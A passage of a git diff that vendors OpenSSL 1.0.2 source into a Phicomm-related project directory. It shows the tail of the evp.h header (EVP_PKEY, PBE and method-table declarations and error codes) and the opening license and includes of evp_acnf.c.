+EVP_PKEY *d2i_AutoPrivateKey(EVP_PKEY **a, const unsigned char **pp,
+                             long length);
+int i2d_PrivateKey(EVP_PKEY *a, unsigned char **pp);
+
+int EVP_PKEY_copy_parameters(EVP_PKEY *to, const EVP_PKEY *from);
+int EVP_PKEY_missing_parameters(const EVP_PKEY *pkey);
+int EVP_PKEY_save_parameters(EVP_PKEY *pkey, int mode);
+int EVP_PKEY_cmp_parameters(const EVP_PKEY *a, const EVP_PKEY *b);
+
+int EVP_PKEY_cmp(const EVP_PKEY *a, const EVP_PKEY *b);
+
+int EVP_PKEY_print_public(BIO *out, const EVP_PKEY *pkey,
+                          int indent, ASN1_PCTX *pctx);
+int EVP_PKEY_print_private(BIO *out, const EVP_PKEY *pkey,
+                           int indent, ASN1_PCTX *pctx);
+int EVP_PKEY_print_params(BIO *out, const EVP_PKEY *pkey,
+                          int indent, ASN1_PCTX *pctx);
+
+int EVP_PKEY_get_default_digest_nid(EVP_PKEY *pkey, int *pnid);
+
+int EVP_CIPHER_type(const EVP_CIPHER *ctx);
+
+/* calls methods */
+int EVP_CIPHER_param_to_asn1(EVP_CIPHER_CTX *c, ASN1_TYPE *type);
+int EVP_CIPHER_asn1_to_param(EVP_CIPHER_CTX *c, ASN1_TYPE *type);
+
+/* These are used by EVP_CIPHER methods */
+int EVP_CIPHER_set_asn1_iv(EVP_CIPHER_CTX *c, ASN1_TYPE *type);
+int EVP_CIPHER_get_asn1_iv(EVP_CIPHER_CTX *c, ASN1_TYPE *type);
+
+/* PKCS5 password based encryption */
+int PKCS5_PBE_keyivgen(EVP_CIPHER_CTX *ctx, const char *pass, int passlen,
+                       ASN1_TYPE *param, const EVP_CIPHER *cipher,
+                       const EVP_MD *md, int en_de);
+int PKCS5_PBKDF2_HMAC_SHA1(const char *pass, int passlen,
+                           const unsigned char *salt, int saltlen, int iter,
+                           int keylen, unsigned char *out);
+int PKCS5_PBKDF2_HMAC(const char *pass, int passlen,
+                      const unsigned char *salt, int saltlen, int iter,
+                      const EVP_MD *digest, int keylen, unsigned char *out);
+int PKCS5_v2_PBE_keyivgen(EVP_CIPHER_CTX *ctx, const char *pass, int passlen,
+                          ASN1_TYPE *param, const EVP_CIPHER *cipher,
+                          const EVP_MD *md, int en_de);
+
+void PKCS5_PBE_add(void);
+
+int EVP_PBE_CipherInit(ASN1_OBJECT *pbe_obj, const char *pass, int passlen,
+                       ASN1_TYPE *param, EVP_CIPHER_CTX *ctx, int en_de);
+
+/* PBE type */
+
+/* Can appear as the outermost AlgorithmIdentifier */
+# define EVP_PBE_TYPE_OUTER      0x0
+/* Is an PRF type OID */
+# define EVP_PBE_TYPE_PRF        0x1
+
+int EVP_PBE_alg_add_type(int pbe_type, int pbe_nid, int cipher_nid,
+                         int md_nid, EVP_PBE_KEYGEN *keygen);
+int EVP_PBE_alg_add(int nid, const EVP_CIPHER *cipher, const EVP_MD *md,
+                    EVP_PBE_KEYGEN *keygen);
+int EVP_PBE_find(int type, int pbe_nid, int *pcnid, int *pmnid,
+                 EVP_PBE_KEYGEN **pkeygen);
+void EVP_PBE_cleanup(void);
+
+# define ASN1_PKEY_ALIAS         0x1
+# define ASN1_PKEY_DYNAMIC       0x2
+# define ASN1_PKEY_SIGPARAM_NULL 0x4
+
+# define ASN1_PKEY_CTRL_PKCS7_SIGN       0x1
+# define ASN1_PKEY_CTRL_PKCS7_ENCRYPT    0x2
+# define ASN1_PKEY_CTRL_DEFAULT_MD_NID   0x3
+# define ASN1_PKEY_CTRL_CMS_SIGN         0x5
+# define ASN1_PKEY_CTRL_CMS_ENVELOPE     0x7
+# define ASN1_PKEY_CTRL_CMS_RI_TYPE      0x8
+
+int EVP_PKEY_asn1_get_count(void);
+const EVP_PKEY_ASN1_METHOD *EVP_PKEY_asn1_get0(int idx);
+const EVP_PKEY_ASN1_METHOD *EVP_PKEY_asn1_find(ENGINE **pe, int type);
+const EVP_PKEY_ASN1_METHOD *EVP_PKEY_asn1_find_str(ENGINE **pe,
+                                                   const char *str, int len);
+int EVP_PKEY_asn1_add0(const EVP_PKEY_ASN1_METHOD *ameth);
+int EVP_PKEY_asn1_add_alias(int to, int from);
+int EVP_PKEY_asn1_get0_info(int *ppkey_id, int *pkey_base_id,
+                            int *ppkey_flags, const char **pinfo,
+                            const char **ppem_str,
+                            const EVP_PKEY_ASN1_METHOD *ameth);
+
+const EVP_PKEY_ASN1_METHOD *EVP_PKEY_get0_asn1(EVP_PKEY *pkey);
+EVP_PKEY_ASN1_METHOD *EVP_PKEY_asn1_new(int id, int flags,
+                                        const char *pem_str,
+                                        const char *info);
+void EVP_PKEY_asn1_copy(EVP_PKEY_ASN1_METHOD *dst,
+                        const EVP_PKEY_ASN1_METHOD *src);
+void EVP_PKEY_asn1_free(EVP_PKEY_ASN1_METHOD *ameth);
+void EVP_PKEY_asn1_set_public(EVP_PKEY_ASN1_METHOD *ameth,
+                              int (*pub_decode) (EVP_PKEY *pk,
+                                                 X509_PUBKEY *pub),
+                              int (*pub_encode) (X509_PUBKEY *pub,
+                                                 const EVP_PKEY *pk),
+                              int (*pub_cmp) (const EVP_PKEY *a,
+                                              const EVP_PKEY *b),
+                              int (*pub_print) (BIO *out,
+                                                const EVP_PKEY *pkey,
+                                                int indent, ASN1_PCTX *pctx),
+                              int (*pkey_size) (const EVP_PKEY *pk),
+                              int (*pkey_bits) (const EVP_PKEY *pk));
+void EVP_PKEY_asn1_set_private(EVP_PKEY_ASN1_METHOD *ameth,
+                               int (*priv_decode) (EVP_PKEY *pk,
+                                                   PKCS8_PRIV_KEY_INFO
+                                                   *p8inf),
+                               int (*priv_encode) (PKCS8_PRIV_KEY_INFO *p8,
+                                                   const EVP_PKEY *pk),
+                               int (*priv_print) (BIO *out,
+                                                  const EVP_PKEY *pkey,
+                                                  int indent,
+                                                  ASN1_PCTX *pctx));
+void EVP_PKEY_asn1_set_param(EVP_PKEY_ASN1_METHOD *ameth,
+                             int (*param_decode) (EVP_PKEY *pkey,
+                                                  const unsigned char **pder,
+                                                  int derlen),
+                             int (*param_encode) (const EVP_PKEY *pkey,
+                                                  unsigned char **pder),
+                             int (*param_missing) (const EVP_PKEY *pk),
+                             int (*param_copy) (EVP_PKEY *to,
+                                                const EVP_PKEY *from),
+                             int (*param_cmp) (const EVP_PKEY *a,
+                                               const EVP_PKEY *b),
+                             int (*param_print) (BIO *out,
+                                                 const EVP_PKEY *pkey,
+                                                 int indent,
+                                                 ASN1_PCTX *pctx));
+
+void EVP_PKEY_asn1_set_free(EVP_PKEY_ASN1_METHOD *ameth,
+                            void (*pkey_free) (EVP_PKEY *pkey));
+void EVP_PKEY_asn1_set_ctrl(EVP_PKEY_ASN1_METHOD *ameth,
+                            int (*pkey_ctrl) (EVP_PKEY *pkey, int op,
+                                              long arg1, void *arg2));
+
+# define EVP_PKEY_OP_UNDEFINED           0
+# define EVP_PKEY_OP_PARAMGEN            (1<<1)
+# define EVP_PKEY_OP_KEYGEN              (1<<2)
+# define EVP_PKEY_OP_SIGN                (1<<3)
+# define EVP_PKEY_OP_VERIFY              (1<<4)
+# define EVP_PKEY_OP_VERIFYRECOVER       (1<<5)
+# define EVP_PKEY_OP_SIGNCTX             (1<<6)
+# define EVP_PKEY_OP_VERIFYCTX           (1<<7)
+# define EVP_PKEY_OP_ENCRYPT             (1<<8)
+# define EVP_PKEY_OP_DECRYPT             (1<<9)
+# define EVP_PKEY_OP_DERIVE              (1<<10)
+
+# define EVP_PKEY_OP_TYPE_SIG    \
+        (EVP_PKEY_OP_SIGN | EVP_PKEY_OP_VERIFY | EVP_PKEY_OP_VERIFYRECOVER \
+                | EVP_PKEY_OP_SIGNCTX | EVP_PKEY_OP_VERIFYCTX)
+
+# define EVP_PKEY_OP_TYPE_CRYPT \
+        (EVP_PKEY_OP_ENCRYPT | EVP_PKEY_OP_DECRYPT)
+
+# define EVP_PKEY_OP_TYPE_NOGEN \
+        (EVP_PKEY_OP_SIG | EVP_PKEY_OP_CRYPT | EVP_PKEY_OP_DERIVE)
+
+# define EVP_PKEY_OP_TYPE_GEN \
+                (EVP_PKEY_OP_PARAMGEN | EVP_PKEY_OP_KEYGEN)
+
+# define  EVP_PKEY_CTX_set_signature_md(ctx, md) \
+                EVP_PKEY_CTX_ctrl(ctx, -1, EVP_PKEY_OP_TYPE_SIG,  \
+                                        EVP_PKEY_CTRL_MD, 0, (void *)md)
+
+# define  EVP_PKEY_CTX_get_signature_md(ctx, pmd)        \
+                EVP_PKEY_CTX_ctrl(ctx, -1, EVP_PKEY_OP_TYPE_SIG,  \
+                                        EVP_PKEY_CTRL_GET_MD, 0, (void *)pmd)
+
+# define EVP_PKEY_CTRL_MD                1
+# define EVP_PKEY_CTRL_PEER_KEY          2
+
+# define EVP_PKEY_CTRL_PKCS7_ENCRYPT     3
+# define EVP_PKEY_CTRL_PKCS7_DECRYPT     4
+
+# define EVP_PKEY_CTRL_PKCS7_SIGN        5
+
+# define EVP_PKEY_CTRL_SET_MAC_KEY       6
+
+# define EVP_PKEY_CTRL_DIGESTINIT        7
+
+/* Used by GOST key encryption in TLS */
+# define EVP_PKEY_CTRL_SET_IV            8
+
+# define EVP_PKEY_CTRL_CMS_ENCRYPT       9
+# define EVP_PKEY_CTRL_CMS_DECRYPT       10
+# define EVP_PKEY_CTRL_CMS_SIGN          11
+
+# define EVP_PKEY_CTRL_CIPHER            12
+
+# define EVP_PKEY_CTRL_GET_MD            13
+
+# define EVP_PKEY_ALG_CTRL               0x1000
+
+# define EVP_PKEY_FLAG_AUTOARGLEN        2
+/*
+ * Method handles all operations: don't assume any digest related defaults.
+ */
+# define EVP_PKEY_FLAG_SIGCTX_CUSTOM     4
+
+const EVP_PKEY_METHOD *EVP_PKEY_meth_find(int type);
+EVP_PKEY_METHOD *EVP_PKEY_meth_new(int id, int flags);
+void EVP_PKEY_meth_get0_info(int *ppkey_id, int *pflags,
+                             const EVP_PKEY_METHOD *meth);
+void EVP_PKEY_meth_copy(EVP_PKEY_METHOD *dst, const EVP_PKEY_METHOD *src);
+void EVP_PKEY_meth_free(EVP_PKEY_METHOD *pmeth);
+int EVP_PKEY_meth_add0(const EVP_PKEY_METHOD *pmeth);
+
+EVP_PKEY_CTX *EVP_PKEY_CTX_new(EVP_PKEY *pkey, ENGINE *e);
+EVP_PKEY_CTX *EVP_PKEY_CTX_new_id(int id, ENGINE *e);
+EVP_PKEY_CTX *EVP_PKEY_CTX_dup(EVP_PKEY_CTX *ctx);
+void EVP_PKEY_CTX_free(EVP_PKEY_CTX *ctx);
+
+int EVP_PKEY_CTX_ctrl(EVP_PKEY_CTX *ctx, int keytype, int optype,
+                      int cmd, int p1, void *p2);
+int EVP_PKEY_CTX_ctrl_str(EVP_PKEY_CTX *ctx, const char *type,
+                          const char *value);
+
+int EVP_PKEY_CTX_get_operation(EVP_PKEY_CTX *ctx);
+void EVP_PKEY_CTX_set0_keygen_info(EVP_PKEY_CTX *ctx, int *dat, int datlen);
+
+EVP_PKEY *EVP_PKEY_new_mac_key(int type, ENGINE *e,
+                               const unsigned char *key, int keylen);
+
+void EVP_PKEY_CTX_set_data(EVP_PKEY_CTX *ctx, void *data);
+void *EVP_PKEY_CTX_get_data(EVP_PKEY_CTX *ctx);
+EVP_PKEY *EVP_PKEY_CTX_get0_pkey(EVP_PKEY_CTX *ctx);
+
+EVP_PKEY *EVP_PKEY_CTX_get0_peerkey(EVP_PKEY_CTX *ctx);
+
+void EVP_PKEY_CTX_set_app_data(EVP_PKEY_CTX *ctx, void *data);
+void *EVP_PKEY_CTX_get_app_data(EVP_PKEY_CTX *ctx);
+
+int EVP_PKEY_sign_init(EVP_PKEY_CTX *ctx);
+int EVP_PKEY_sign(EVP_PKEY_CTX *ctx,
+                  unsigned char *sig, size_t *siglen,
+                  const unsigned char *tbs, size_t tbslen);
+int EVP_PKEY_verify_init(EVP_PKEY_CTX *ctx);
+int EVP_PKEY_verify(EVP_PKEY_CTX *ctx,
+                    const unsigned char *sig, size_t siglen,
+                    const unsigned char *tbs, size_t tbslen);
+int EVP_PKEY_verify_recover_init(EVP_PKEY_CTX *ctx);
+int EVP_PKEY_verify_recover(EVP_PKEY_CTX *ctx,
+                            unsigned char *rout, size_t *routlen,
+                            const unsigned char *sig, size_t siglen);
+int EVP_PKEY_encrypt_init(EVP_PKEY_CTX *ctx);
+int EVP_PKEY_encrypt(EVP_PKEY_CTX *ctx,
+                     unsigned char *out, size_t *outlen,
+                     const unsigned char *in, size_t inlen);
+int EVP_PKEY_decrypt_init(EVP_PKEY_CTX *ctx);
+int EVP_PKEY_decrypt(EVP_PKEY_CTX *ctx,
+                     unsigned char *out, size_t *outlen,
+                     const unsigned char *in, size_t inlen);
+
+int EVP_PKEY_derive_init(EVP_PKEY_CTX *ctx);
+int EVP_PKEY_derive_set_peer(EVP_PKEY_CTX *ctx, EVP_PKEY *peer);
+int EVP_PKEY_derive(EVP_PKEY_CTX *ctx, unsigned char *key, size_t *keylen);
+
+typedef int EVP_PKEY_gen_cb (EVP_PKEY_CTX *ctx);
+
+int EVP_PKEY_paramgen_init(EVP_PKEY_CTX *ctx);
+int EVP_PKEY_paramgen(EVP_PKEY_CTX *ctx, EVP_PKEY **ppkey);
+int EVP_PKEY_keygen_init(EVP_PKEY_CTX *ctx);
+int EVP_PKEY_keygen(EVP_PKEY_CTX *ctx, EVP_PKEY **ppkey);
+
+void EVP_PKEY_CTX_set_cb(EVP_PKEY_CTX *ctx, EVP_PKEY_gen_cb *cb);
+EVP_PKEY_gen_cb *EVP_PKEY_CTX_get_cb(EVP_PKEY_CTX *ctx);
+
+int EVP_PKEY_CTX_get_keygen_info(EVP_PKEY_CTX *ctx, int idx);
+
+void EVP_PKEY_meth_set_init(EVP_PKEY_METHOD *pmeth,
+                            int (*init) (EVP_PKEY_CTX *ctx));
+
+void EVP_PKEY_meth_set_copy(EVP_PKEY_METHOD *pmeth,
+                            int (*copy) (EVP_PKEY_CTX *dst,
+                                         EVP_PKEY_CTX *src));
+
+void EVP_PKEY_meth_set_cleanup(EVP_PKEY_METHOD *pmeth,
+                               void (*cleanup) (EVP_PKEY_CTX *ctx));
+
+void EVP_PKEY_meth_set_paramgen(EVP_PKEY_METHOD *pmeth,
+                                int (*paramgen_init) (EVP_PKEY_CTX *ctx),
+                                int (*paramgen) (EVP_PKEY_CTX *ctx,
+                                                 EVP_PKEY *pkey));
+
+void EVP_PKEY_meth_set_keygen(EVP_PKEY_METHOD *pmeth,
+                              int (*keygen_init) (EVP_PKEY_CTX *ctx),
+                              int (*keygen) (EVP_PKEY_CTX *ctx,
+                                             EVP_PKEY *pkey));
+
+void EVP_PKEY_meth_set_sign(EVP_PKEY_METHOD *pmeth,
+                            int (*sign_init) (EVP_PKEY_CTX *ctx),
+                            int (*sign) (EVP_PKEY_CTX *ctx,
+                                         unsigned char *sig, size_t *siglen,
+                                         const unsigned char *tbs,
+                                         size_t tbslen));
+
+void EVP_PKEY_meth_set_verify(EVP_PKEY_METHOD *pmeth,
+                              int (*verify_init) (EVP_PKEY_CTX *ctx),
+                              int (*verify) (EVP_PKEY_CTX *ctx,
+                                             const unsigned char *sig,
+                                             size_t siglen,
+                                             const unsigned char *tbs,
+                                             size_t tbslen));
+
+void EVP_PKEY_meth_set_verify_recover(EVP_PKEY_METHOD *pmeth,
+                                      int (*verify_recover_init) (EVP_PKEY_CTX
+                                                                  *ctx),
+                                      int (*verify_recover) (EVP_PKEY_CTX
+                                                             *ctx,
+                                                             unsigned char
+                                                             *sig,
+                                                             size_t *siglen,
+                                                             const unsigned
+                                                             char *tbs,
+                                                             size_t tbslen));
+
+void EVP_PKEY_meth_set_signctx(EVP_PKEY_METHOD *pmeth,
+                               int (*signctx_init) (EVP_PKEY_CTX *ctx,
+                                                    EVP_MD_CTX *mctx),
+                               int (*signctx) (EVP_PKEY_CTX *ctx,
+                                               unsigned char *sig,
+                                               size_t *siglen,
+                                               EVP_MD_CTX *mctx));
+
+void EVP_PKEY_meth_set_verifyctx(EVP_PKEY_METHOD *pmeth,
+                                 int (*verifyctx_init) (EVP_PKEY_CTX *ctx,
+                                                        EVP_MD_CTX *mctx),
+                                 int (*verifyctx) (EVP_PKEY_CTX *ctx,
+                                                   const unsigned char *sig,
+                                                   int siglen,
+                                                   EVP_MD_CTX *mctx));
+
+void EVP_PKEY_meth_set_encrypt(EVP_PKEY_METHOD *pmeth,
+                               int (*encrypt_init) (EVP_PKEY_CTX *ctx),
+                               int (*encryptfn) (EVP_PKEY_CTX *ctx,
+                                                 unsigned char *out,
+                                                 size_t *outlen,
+                                                 const unsigned char *in,
+                                                 size_t inlen));
+
+void EVP_PKEY_meth_set_decrypt(EVP_PKEY_METHOD *pmeth,
+                               int (*decrypt_init) (EVP_PKEY_CTX *ctx),
+                               int (*decrypt) (EVP_PKEY_CTX *ctx,
+                                               unsigned char *out,
+                                               size_t *outlen,
+                                               const unsigned char *in,
+                                               size_t inlen));
+
+void EVP_PKEY_meth_set_derive(EVP_PKEY_METHOD *pmeth,
+                              int (*derive_init) (EVP_PKEY_CTX *ctx),
+                              int (*derive) (EVP_PKEY_CTX *ctx,
+                                             unsigned char *key,
+                                             size_t *keylen));
+
+void EVP_PKEY_meth_set_ctrl(EVP_PKEY_METHOD *pmeth,
+                            int (*ctrl) (EVP_PKEY_CTX *ctx, int type, int p1,
+                                         void *p2),
+                            int (*ctrl_str) (EVP_PKEY_CTX *ctx,
+                                             const char *type,
+                                             const char *value));
+
+void EVP_add_alg_module(void);
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_EVP_strings(void);
+
+/* Error codes for the EVP functions. */
+
+/* Function codes. */
+# define EVP_F_AESNI_INIT_KEY                             165
+# define EVP_F_AESNI_XTS_CIPHER                           176
+# define EVP_F_AES_INIT_KEY                               133
+# define EVP_F_AES_T4_INIT_KEY                            178
+# define EVP_F_AES_XTS                                    172
+# define EVP_F_AES_XTS_CIPHER                             175
+# define EVP_F_ALG_MODULE_INIT                            177
+# define EVP_F_CAMELLIA_INIT_KEY                          159
+# define EVP_F_CMAC_INIT                                  173
+# define EVP_F_CMLL_T4_INIT_KEY                           179
+# define EVP_F_D2I_PKEY                                   100
+# define EVP_F_DO_SIGVER_INIT                             161
+# define EVP_F_DSAPKEY2PKCS8                              134
+# define EVP_F_DSA_PKEY2PKCS8                             135
+# define EVP_F_ECDSA_PKEY2PKCS8                           129
+# define EVP_F_ECKEY_PKEY2PKCS8                           132
+# define EVP_F_EVP_CIPHERINIT_EX                          123
+# define EVP_F_EVP_CIPHER_CTX_COPY                        163
+# define EVP_F_EVP_CIPHER_CTX_CTRL                        124
+# define EVP_F_EVP_CIPHER_CTX_SET_KEY_LENGTH              122
+# define EVP_F_EVP_DECRYPTFINAL_EX                        101
+# define EVP_F_EVP_DIGESTINIT_EX                          128
+# define EVP_F_EVP_ENCRYPTFINAL_EX                        127
+# define EVP_F_EVP_MD_CTX_COPY_EX                         110
+# define EVP_F_EVP_MD_SIZE                                162
+# define EVP_F_EVP_OPENINIT                               102
+# define EVP_F_EVP_PBE_ALG_ADD                            115
+# define EVP_F_EVP_PBE_ALG_ADD_TYPE                       160
+# define EVP_F_EVP_PBE_CIPHERINIT                         116
+# define EVP_F_EVP_PKCS82PKEY                             111
+# define EVP_F_EVP_PKCS82PKEY_BROKEN                      136
+# define EVP_F_EVP_PKEY2PKCS8_BROKEN                      113
+# define EVP_F_EVP_PKEY_COPY_PARAMETERS                   103
+# define EVP_F_EVP_PKEY_CTX_CTRL                          137
+# define EVP_F_EVP_PKEY_CTX_CTRL_STR                      150
+# define EVP_F_EVP_PKEY_CTX_DUP                           156
+# define EVP_F_EVP_PKEY_DECRYPT                           104
+# define EVP_F_EVP_PKEY_DECRYPT_INIT                      138
+# define EVP_F_EVP_PKEY_DECRYPT_OLD                       151
+# define EVP_F_EVP_PKEY_DERIVE                            153
+# define EVP_F_EVP_PKEY_DERIVE_INIT                       154
+# define EVP_F_EVP_PKEY_DERIVE_SET_PEER                   155
+# define EVP_F_EVP_PKEY_ENCRYPT                           105
+# define EVP_F_EVP_PKEY_ENCRYPT_INIT                      139
+# define EVP_F_EVP_PKEY_ENCRYPT_OLD                       152
+# define EVP_F_EVP_PKEY_GET1_DH                           119
+# define EVP_F_EVP_PKEY_GET1_DSA                          120
+# define EVP_F_EVP_PKEY_GET1_ECDSA                        130
+# define EVP_F_EVP_PKEY_GET1_EC_KEY                       131
+# define EVP_F_EVP_PKEY_GET1_RSA                          121
+# define EVP_F_EVP_PKEY_KEYGEN                            146
+# define EVP_F_EVP_PKEY_KEYGEN_INIT                       147
+# define EVP_F_EVP_PKEY_NEW                               106
+# define EVP_F_EVP_PKEY_PARAMGEN                          148
+# define EVP_F_EVP_PKEY_PARAMGEN_INIT                     149
+# define EVP_F_EVP_PKEY_SIGN                              140
+# define EVP_F_EVP_PKEY_SIGN_INIT                         141
+# define EVP_F_EVP_PKEY_VERIFY                            142
+# define EVP_F_EVP_PKEY_VERIFY_INIT                       143
+# define EVP_F_EVP_PKEY_VERIFY_RECOVER                    144
+# define EVP_F_EVP_PKEY_VERIFY_RECOVER_INIT               145
+# define EVP_F_EVP_RIJNDAEL                               126
+# define EVP_F_EVP_SIGNFINAL                              107
+# define EVP_F_EVP_VERIFYFINAL                            108
+# define EVP_F_FIPS_CIPHERINIT                            166
+# define EVP_F_FIPS_CIPHER_CTX_COPY                       170
+# define EVP_F_FIPS_CIPHER_CTX_CTRL                       167
+# define EVP_F_FIPS_CIPHER_CTX_SET_KEY_LENGTH             171
+# define EVP_F_FIPS_DIGESTINIT                            168
+# define EVP_F_FIPS_MD_CTX_COPY                           169
+# define EVP_F_HMAC_INIT_EX                               174
+# define EVP_F_INT_CTX_NEW                                157
+# define EVP_F_PKCS5_PBE_KEYIVGEN                         117
+# define EVP_F_PKCS5_V2_PBE_KEYIVGEN                      118
+# define EVP_F_PKCS5_V2_PBKDF2_KEYIVGEN                   164
+# define EVP_F_PKCS8_SET_BROKEN                           112
+# define EVP_F_PKEY_SET_TYPE                              158
+# define EVP_F_RC2_MAGIC_TO_METH                          109
+# define EVP_F_RC5_CTRL                                   125
+
+/* Reason codes. */
+# define EVP_R_AES_IV_SETUP_FAILED                        162
+# define EVP_R_AES_KEY_SETUP_FAILED                       143
+# define EVP_R_ASN1_LIB                                   140
+# define EVP_R_BAD_BLOCK_LENGTH                           136
+# define EVP_R_BAD_DECRYPT                                100
+# define EVP_R_BAD_KEY_LENGTH                             137
+# define EVP_R_BN_DECODE_ERROR                            112
+# define EVP_R_BN_PUBKEY_ERROR                            113
+# define EVP_R_BUFFER_TOO_SMALL                           155
+# define EVP_R_CAMELLIA_KEY_SETUP_FAILED                  157
+# define EVP_R_CIPHER_PARAMETER_ERROR                     122
+# define EVP_R_COMMAND_NOT_SUPPORTED                      147
+# define EVP_R_CTRL_NOT_IMPLEMENTED                       132
+# define EVP_R_CTRL_OPERATION_NOT_IMPLEMENTED             133
+# define EVP_R_DATA_NOT_MULTIPLE_OF_BLOCK_LENGTH          138
+# define EVP_R_DECODE_ERROR                               114
+# define EVP_R_DIFFERENT_KEY_TYPES                        101
+# define EVP_R_DIFFERENT_PARAMETERS                       153
+# define EVP_R_DISABLED_FOR_FIPS                          163
+# define EVP_R_ENCODE_ERROR                               115
+# define EVP_R_ERROR_LOADING_SECTION                      165
+# define EVP_R_ERROR_SETTING_FIPS_MODE                    166
+# define EVP_R_EVP_PBE_CIPHERINIT_ERROR                   119
+# define EVP_R_EXPECTING_AN_RSA_KEY                       127
+# define EVP_R_EXPECTING_A_DH_KEY                         128
+# define EVP_R_EXPECTING_A_DSA_KEY                        129
+# define EVP_R_EXPECTING_A_ECDSA_KEY                      141
+# define EVP_R_EXPECTING_A_EC_KEY                         142
+# define EVP_R_FIPS_MODE_NOT_SUPPORTED                    167
+# define EVP_R_INITIALIZATION_ERROR                       134
+# define EVP_R_INPUT_NOT_INITIALIZED                      111
+# define EVP_R_INVALID_DIGEST                             152
+# define EVP_R_INVALID_FIPS_MODE                          168
+# define EVP_R_INVALID_KEY_LENGTH                         130
+# define EVP_R_INVALID_OPERATION                          148
+# define EVP_R_IV_TOO_LARGE                               102
+# define EVP_R_KEYGEN_FAILURE                             120
+# define EVP_R_MESSAGE_DIGEST_IS_NULL                     159
+# define EVP_R_METHOD_NOT_SUPPORTED                       144
+# define EVP_R_MISSING_PARAMETERS                         103
+# define EVP_R_NO_CIPHER_SET                              131
+# define EVP_R_NO_DEFAULT_DIGEST                          158
+# define EVP_R_NO_DIGEST_SET                              139
+# define EVP_R_NO_DSA_PARAMETERS                          116
+# define EVP_R_NO_KEY_SET                                 154
+# define EVP_R_NO_OPERATION_SET                           149
+# define EVP_R_NO_SIGN_FUNCTION_CONFIGURED                104
+# define EVP_R_NO_VERIFY_FUNCTION_CONFIGURED              105
+# define EVP_R_OPERATION_NOT_SUPPORTED_FOR_THIS_KEYTYPE   150
+# define EVP_R_OPERATON_NOT_INITIALIZED                   151
+# define EVP_R_PKCS8_UNKNOWN_BROKEN_TYPE                  117
+# define EVP_R_PRIVATE_KEY_DECODE_ERROR                   145
+# define EVP_R_PRIVATE_KEY_ENCODE_ERROR                   146
+# define EVP_R_PUBLIC_KEY_NOT_RSA                         106
+# define EVP_R_TOO_LARGE                                  164
+# define EVP_R_UNKNOWN_CIPHER                             160
+# define EVP_R_UNKNOWN_DIGEST                             161
+# define EVP_R_UNKNOWN_OPTION                             169
+# define EVP_R_UNKNOWN_PBE_ALGORITHM                      121
+# define EVP_R_UNSUPORTED_NUMBER_OF_ROUNDS                135
+# define EVP_R_UNSUPPORTED_ALGORITHM                      156
+# define EVP_R_UNSUPPORTED_CIPHER                         107
+# define EVP_R_UNSUPPORTED_KEYLENGTH                      123
+# define EVP_R_UNSUPPORTED_KEY_DERIVATION_FUNCTION        124
+# define EVP_R_UNSUPPORTED_KEY_SIZE                       108
+# define EVP_R_UNSUPPORTED_PRF                            125
+# define EVP_R_UNSUPPORTED_PRIVATE_KEY_ALGORITHM          118
+# define EVP_R_UNSUPPORTED_SALT_TYPE                      126
+# define EVP_R_WRAP_MODE_NOT_ALLOWED                      170
+# define EVP_R_WRONG_FINAL_BLOCK_LENGTH                   109
+# define EVP_R_WRONG_PUBLIC_KEY_TYPE                      110
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_acnf.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_acnf.c
new file mode 100644
index 0000000..9703116
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_acnf.c
@@ -0,0 +1,73 @@
+/* evp_acnf.c */
+/*
+ * Written by Stephen Henson (steve@openssl.org) for the OpenSSL project
+ * 2001.
+ */
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/conf.h>
+
+/*
+ * Load all algorithms and configure OpenSSL. This function is called
+ * automatically when OPENSSL_LOAD_CONF is set.
+ */
+
